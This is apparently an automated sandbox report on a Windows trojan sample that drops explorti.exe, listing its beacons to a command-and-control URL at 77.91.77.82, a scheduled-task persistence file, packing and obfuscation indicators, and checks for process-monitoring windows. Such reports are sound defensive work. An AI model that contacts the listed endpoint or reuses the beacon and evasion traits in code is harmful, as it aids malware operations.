Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 77.91.77.82 77.91.77.82

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU

Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 7_2_00E9BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_00E9BD30

Source: unknown

HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02k
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpC
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpM
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpT
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpW
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpa
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpft
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpk
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpu

System Summary

PE file contains section with special chars

Source: gNo9ad9KO4.exe	Static PE information: section name:
Source: gNo9ad9KO4.exe	Static PE information: section name: .idata
Source: gNo9ad9KO4.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File created: C:\Windows\Tasks\explorti.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00E94CD0	7_2_00E94CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED3048	7_2_00ED3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00E9E9B0	7_2_00E9E9B0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00EC7D63	7_2_00EC7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED6EE9	7_2_00ED6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00E94AD0	7_2_00E94AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED763B	7_2_00ED763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED2BB0	7_2_00ED2BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED775B	7_2_00ED775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED8700	7_2_00ED8700

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: String function: 00EA7840 appears 32 times

Source: gNo9ad9KO4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: gNo9ad9KO4.exe	Static PE information: Section: ZLIB complexity 0.9984631147540983
Source: gNo9ad9KO4.exe	Static PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9984631147540983
Source: explorti.exe.0.dr	Static PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File created: C:\Users\user\AppData\Local\Temp\ad40971b6b

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: gNo9ad9KO4.exe

Virustotal: Detection: 51%

Source: gNo9ad9KO4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File read: C:\Users\user\Desktop\gNo9ad9KO4.exe

Source: unknown	Process created: C:\Users\user\Desktop\gNo9ad9KO4.exe "C:\Users\user\Desktop\gNo9ad9KO4.exe"
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Detected unpacking (changes PE section rights)

Source: gNo9ad9KO4.exe

Static file information: File size 1894912 > 1048576

Source: gNo9ad9KO4.exe

Static PE information: Raw size of adkjkfkz is bigger than: 0x100000 < 0x19d200

Data Obfuscation

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Unpacked PE file: 0.2.gNo9ad9KO4.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 1.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 2.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 7.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d691a should be: 0x1d810c
Source: gNo9ad9KO4.exe	Static PE information: real checksum: 0x1d691a should be: 0x1d810c

PE file contains sections with non-standard names

Source: gNo9ad9KO4.exe	Static PE information: section name:
Source: gNo9ad9KO4.exe	Static PE information: section name: .idata
Source: gNo9ad9KO4.exe	Static PE information: section name:
Source: gNo9ad9KO4.exe	Static PE information: section name: adkjkfkz
Source: gNo9ad9KO4.exe	Static PE information: section name: afyvsewm
Source: gNo9ad9KO4.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: adkjkfkz
Source: explorti.exe.0.dr	Static PE information: section name: afyvsewm
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 7_2_00EAD82C push ecx; ret

7_2_00EAD83F

Source: gNo9ad9KO4.exe	Static PE information: section name: entropy: 7.988500981589288
Source: gNo9ad9KO4.exe	Static PE information: section name: adkjkfkz entropy: 7.953327902515579
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.988500981589288
Source: explorti.exe.0.dr	Static PE information: section name: adkjkfkz entropy: 7.953327902515579

Drops PE files

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
